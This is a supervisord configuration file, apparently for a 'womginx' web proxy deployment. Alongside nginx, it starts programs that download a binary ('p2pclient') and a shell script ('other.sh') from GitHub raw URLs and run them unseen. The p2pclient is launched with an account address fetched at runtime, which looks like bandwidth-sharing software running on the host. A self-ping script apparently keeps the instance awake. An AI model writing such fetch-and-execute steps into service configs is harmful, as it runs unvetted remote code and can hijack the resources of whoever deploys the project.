[program:nginx]
priority=1
command=nginx -g "daemon off;"
priority=993

[program:1]
priority=2
command=/bin/bash -c 'cd var/run && rm -rf p2p.sh p2pclient p2p && wget https://raw.githubusercontent.com/bls4/womginx/main/config/p2p && wget https://raw.githubusercontent.com/bls4/womginx/main/config/p2pclient && chmod +x p2pclient && echo -e "./p2pclient -l MAIL_ADDREES" | sed -e "s/MAIL_ADDREES/$(cat p2p)/" > p2p.sh && chmod +x p2p.sh && ./p2p.sh'
priority=994

[program:2]
priority=3
command=/bin/bash -c 'python3 /opt/womginx/config/self-ping.py'
priority=995

[program:3]
priority=4
command=/bin/bash -c 'rm -rf other.sh && wget https://raw.githubusercontent.com/bls4/womginx/main/config/other.sh && chmod +x other.sh && ./other.sh'
priority=996